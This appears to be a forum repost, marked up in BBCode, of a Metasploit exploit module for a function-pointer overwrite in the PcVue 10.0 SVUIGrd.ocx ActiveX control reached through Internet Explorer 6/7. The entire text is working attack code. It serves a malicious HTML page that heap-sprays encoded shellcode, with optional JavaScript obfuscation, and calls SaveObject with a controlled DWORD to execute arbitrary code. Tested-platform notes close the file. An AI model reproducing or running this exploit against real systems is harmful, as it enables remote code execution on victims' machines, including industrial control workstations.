Kod:
[COLOR=#008200]## [/COLOR]
[COLOR=#008200]# $Id: pcvue_func.rb 13889 2011-10-12 10:57:31Z sinn3r $ [/COLOR]
[COLOR=#008200]## [/COLOR]
[COLOR=#008200]## [/COLOR]
[COLOR=#008200]# This file is part of the ****sploit Framework and may be subject to [/COLOR]
[COLOR=#008200]# redistribution and commercial restrictions. Please see the ****sploit [/COLOR]
[COLOR=#008200]# Framework web site for more information on licensing and terms of use. [/COLOR]
[COLOR=#008200]# http://****sploit.com/framework/ [/COLOR]
[COLOR=#008200]## [/COLOR]
require [COLOR=#0000ff]'msf/core'[/COLOR]
[B][COLOR=#006699]class[/COLOR][/B] ****sploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpServer::[COLOR=#0066cc]HTML[/COLOR]
[B][COLOR=#006699]def[/COLOR][/B] initialize(info = {})
[B][COLOR=#006699]super[/COLOR][/B](update_info(info,
[COLOR=#0000ff]'Name'[/COLOR] => [COLOR=#0000ff]"PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability"[/COLOR],
[COLOR=#0000ff]'Description'[/COLOR] => %q{
This [B][COLOR=#006699]module[/COLOR][/B] exploits a function pointer control within SVUIGrd.ocx of PcVue [COLOR=#0066cc]10[/COLOR].[COLOR=#0066cc]0[/COLOR].
By setting a dword value [B][COLOR=#006699]for[/COLOR][/B] the SaveObject() [B][COLOR=#006699]or[/COLOR][/B] LoadObject(), an attacker can
overwrite a function pointer [B][COLOR=#006699]and[/COLOR][/B] execute arbitrary code.
},
[COLOR=#0000ff]'License'[/COLOR] => [COLOR=#0066cc]MSF_LICENSE[/COLOR],
[COLOR=#0000ff]'Author'[/COLOR] =>
[
[COLOR=#0000ff]'Luigi Auriemma'[/COLOR], [COLOR=#008200]# original find [/COLOR]
[COLOR=#0000ff]'mr_me <steventhomasseeley[at]gmail-com>'[/COLOR], [COLOR=#008200]# msf module [/COLOR]
[COLOR=#0000ff]'TecR0c <roccogiovannicalvi[at]gmail-com >'[/COLOR],[COLOR=#008200]# msf module [/COLOR]
],
[COLOR=#0000ff]'Version'[/COLOR] => [COLOR=#0000ff]'$Revision: 13889 $'[/COLOR],
[COLOR=#0000ff]'References'[/COLOR] =>
[
[ [COLOR=#0000ff]'BID'[/COLOR], [COLOR=#0000ff]'49795'[/COLOR]],
[ [COLOR=#0000ff]'URL'[/COLOR], [COLOR=#0000ff]'http://aluigi.altervista.org/adv/pcvue_1-adv.txt'[/COLOR]],
],
[COLOR=#0000ff]'DefaultOptions'[/COLOR] =>
{
[COLOR=#0000ff]'EXITFUNC'[/COLOR] => [COLOR=#0000ff]'process'[/COLOR],
[COLOR=#0000ff]'InitialAutoRunScript'[/COLOR] => [COLOR=#0000ff]'migrate -f'[/COLOR]
},
[COLOR=#0000ff]'Payload'[/COLOR] =>
{
[COLOR=#0000ff]'Space'[/COLOR] => [COLOR=#0066cc]1024[/COLOR],
[COLOR=#0000ff]'BadChars'[/COLOR] => [COLOR=#0000ff]"\x00\x0a\x0d"[/COLOR],
[COLOR=#0000ff]'StackAdjustment'[/COLOR] => -[COLOR=#0066cc]3500[/COLOR],
},
[COLOR=#0000ff]'Platform'[/COLOR] => [COLOR=#0000ff]'win'[/COLOR],
[COLOR=#0000ff]'Targets'[/COLOR] =>
[
[
[COLOR=#008200]#IE 6/7 on Widnows XP and Vista [/COLOR]
[COLOR=#0000ff]'Internet Explorer 6 / Internet Explorer 7'[/COLOR],
{
[COLOR=#0000ff]'Ret'[/COLOR] => 0x0a0a0a0a,
[COLOR=#0000ff]'Offset'[/COLOR] => [COLOR=#0066cc]1000[/COLOR]
}
]
],
[COLOR=#0000ff]'DisclosureDate'[/COLOR] => [COLOR=#0000ff]'Oct 5 2011'[/COLOR],
[COLOR=#0000ff]'DefaultTarget'[/COLOR] => [COLOR=#0066cc]0[/COLOR]))
register_options(
[
OptString.[B][COLOR=#006699]new[/COLOR][/B]([COLOR=#0000ff]'FILENAME'[/COLOR], [ [B][COLOR=#006699]false[/COLOR][/B], [COLOR=#0000ff]'The file name.'[/COLOR], [COLOR=#0000ff]'msf.html'[/COLOR]]),
OptBool.[B][COLOR=#006699]new[/COLOR][/B]([COLOR=#0000ff]'OBFUSCATE'[/COLOR], [[B][COLOR=#006699]false[/COLOR][/B], [COLOR=#0000ff]'Enable JavaScript Obfuscation'[/COLOR], [B][COLOR=#006699]true[/COLOR][/B]]),
], [B][COLOR=#006699]self[/COLOR][/B].[B][COLOR=#006699]class[/COLOR][/B])
[B][COLOR=#006699]end[/COLOR][/B]
[B][COLOR=#006699]def[/COLOR][/B] on_request_uri(cli, request)
[COLOR=#008200]#If not IE, we don't continue [/COLOR]
agent = request.headers[[COLOR=#0000ff]'User-Agent'[/COLOR]]
[B][COLOR=#006699]if[/COLOR][/B] agent !~ /[COLOR=#0066cc]MSIE[/COLOR] [[COLOR=#0066cc]6[/COLOR]|[COLOR=#0066cc]7[/COLOR]]\.[COLOR=#0066cc]0[/COLOR]/
print_error([COLOR=#0000ff]"Target not supported: #{agent.to_s}"[/COLOR])
send_not_found(cli)
[B][COLOR=#006699]return[/COLOR][/B]
[B][COLOR=#006699]end[/COLOR][/B]
[COLOR=#008200]# Encode the shellcode [/COLOR]
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
[COLOR=#008200]# Setup exploit buffers [/COLOR]
nops = Rex::Text.to_unescape([target.ret].pack([COLOR=#0000ff]'V'[/COLOR]))
ret = [COLOR=#0000ff]"0x%08x"[/COLOR] % target.ret
blocksize = 0x50000
fillto = [COLOR=#0066cc]200[/COLOR]
[COLOR=#008200]# Randomize the javascript variable names [/COLOR]
obj_name = rand_text_alpha(rand([COLOR=#0066cc]100[/COLOR]) + [COLOR=#0066cc]1[/COLOR])
j_shellcode = rand_text_alpha(rand([COLOR=#0066cc]100[/COLOR]) + [COLOR=#0066cc]1[/COLOR])
j_nops = rand_text_alpha(rand([COLOR=#0066cc]100[/COLOR]) + [COLOR=#0066cc]1[/COLOR])
j_ret = rand_text_alpha(rand([COLOR=#0066cc]100[/COLOR]) + [COLOR=#0066cc]1[/COLOR])
j_headersize = rand_text_alpha(rand([COLOR=#0066cc]100[/COLOR]) + [COLOR=#0066cc]1[/COLOR])
j_slackspace = rand_text_alpha(rand([COLOR=#0066cc]100[/COLOR]) + [COLOR=#0066cc]1[/COLOR])
j_fillblock = rand_text_alpha(rand([COLOR=#0066cc]100[/COLOR]) + [COLOR=#0066cc]1[/COLOR])
j_block = rand_text_alpha(rand([COLOR=#0066cc]100[/COLOR]) + [COLOR=#0066cc]1[/COLOR])
j_memory = rand_text_alpha(rand([COLOR=#0066cc]100[/COLOR]) + [COLOR=#0066cc]1[/COLOR])
j_counter = rand_text_alpha(rand([COLOR=#0066cc]30[/COLOR]) + [COLOR=#0066cc]2[/COLOR])
j_txt = rand_text_alpha(rand([COLOR=#0066cc]8[/COLOR]) + [COLOR=#0066cc]4[/COLOR])
js = <<-[COLOR=#0066cc]EOF[/COLOR]
var [COLOR=#008200]#{j_shellcode} = unescape('#{shellcode}'); [/COLOR]
var [COLOR=#008200]#{j_nops} = unescape("#{nops}"); [/COLOR]
var [COLOR=#008200]#{j_headersize} = 20; [/COLOR]
var [COLOR=#008200]#{j_slackspace} = #{j_headersize} + #{j_shellcode}.length; [/COLOR]
[B][COLOR=#006699]while[/COLOR][/B]([COLOR=#008200]#{j_nops}.length < #{j_slackspace}) { [/COLOR]
[COLOR=#008200]#{j_nops} += #{j_nops}; [/COLOR]
}
var [COLOR=#008200]#{j_fillblock} = #{j_nops}.substring(0, #{j_slackspace}); [/COLOR]
var [COLOR=#008200]#{j_block} = #{j_nops}.substring(0, #{j_nops}.length - #{j_slackspace}); [/COLOR]
[B][COLOR=#006699]while[/COLOR][/B](([COLOR=#008200]#{j_block}.length + #{j_slackspace}) < #{blocksize}) { [/COLOR]
[COLOR=#008200]#{j_block} = #{j_block} + #{j_block} + #{j_fillblock}; [/COLOR]
}
[COLOR=#008200]#{j_memory} = new Array(); [/COLOR]
[B][COLOR=#006699]for[/COLOR][/B]([COLOR=#008200]#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++){ [/COLOR]
[COLOR=#008200]#{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode} ; [/COLOR]
}
function main(){
[COLOR=#008200]#{obj_name}.SaveObject("#{j_txt}.txt", #{ret}, 0); [/COLOR]
}
[COLOR=#0066cc]EOF[/COLOR]
js = js.gsub(/^\t\t/, [COLOR=#0000ff]''[/COLOR])
[COLOR=#008200]#JS obfuscation on demand [/COLOR]
[B][COLOR=#006699]if[/COLOR][/B] datastore[[COLOR=#0000ff]'OBFUSCATE'[/COLOR]]
js = ::Rex::Exploitation::JSObfu.[B][COLOR=#006699]new[/COLOR][/B](js)
js.obfuscate
main_sym = js.sym([COLOR=#0000ff]'main'[/COLOR])
[B][COLOR=#006699]else[/COLOR][/B]
main_sym = [COLOR=#0000ff]"main"[/COLOR]
[B][COLOR=#006699]end[/COLOR][/B]
content = <<-[COLOR=#0066cc]EOF[/COLOR]
<html>
<body>
<object classid=[COLOR=#0000ff]'clsid:2BBD45A5-28AE-11D1-ACAC-0800170967D9'[/COLOR] id=[COLOR=#0000ff]'#{obj_name}'[/COLOR] ></object>
<script language=[COLOR=#0000ff]'javascript'[/COLOR]>
[COLOR=#008200]#{js} [/COLOR]
[COLOR=#008200]#{main_sym}(); [/COLOR]
</script>
</body>
</html>
[COLOR=#0066cc]EOF[/COLOR]
[COLOR=#008200]#Remove the extra tabs from content [/COLOR]
content = content.gsub(/^\t\t/, [COLOR=#0000ff]''[/COLOR])
print_status([COLOR=#0000ff]"Sending exploit to #{cli.peerhost}:#{cli.peerport}"[/COLOR])
send_response(cli, content, {[COLOR=#0000ff]'Content-Type'[/COLOR]=>[COLOR=#0000ff]'text/html'[/COLOR]})
[COLOR=#006699][B]end[/B][/COLOR]
[B][COLOR=#006699]end[/COLOR][/B]
=[B][COLOR=#006699]begin[/COLOR][/B]
Tested successfully on the following platforms:
- PcVue [COLOR=#0066cc]10[/COLOR].[COLOR=#0066cc]0[/COLOR] (SVUIGrd.ocx v1.[COLOR=#0066cc]5[/COLOR].[COLOR=#0066cc]1[/COLOR].[COLOR=#0066cc]0[/COLOR]) on Internet Explorer [COLOR=#0066cc]6[/COLOR] & [COLOR=#0066cc]7[/COLOR], Windows [COLOR=#0066cc]XP[/COLOR] [COLOR=#0066cc]SP3[/COLOR]
[COLOR=#808080]Class[/COLOR] SVUIGrdCtrl
ProgID: [COLOR=#0066cc]SV[/COLOR].UIGrdCtrl.[COLOR=#0066cc]1[/COLOR]
[COLOR=#0066cc]GUID[/COLOR]: {[COLOR=#0066cc]2BBD45A5[/COLOR]-[COLOR=#0066cc]28AE[/COLOR]-[COLOR=#0066cc]11D1[/COLOR]-[COLOR=#0066cc]ACAC[/COLOR]-[COLOR=#0066cc]0800170967D9[/COLOR]}
Number of Interfaces: [COLOR=#0066cc]1[/COLOR]
Default Interface: ISVUIGrd
RegKey Safe [B][COLOR=#006699]for[/COLOR][/B] Script: False
RegkeySafe [B][COLOR=#006699]for[/COLOR][/B] Init: False
KillBitSet: False
=[B][COLOR=#006699]end[/COLOR][/B]
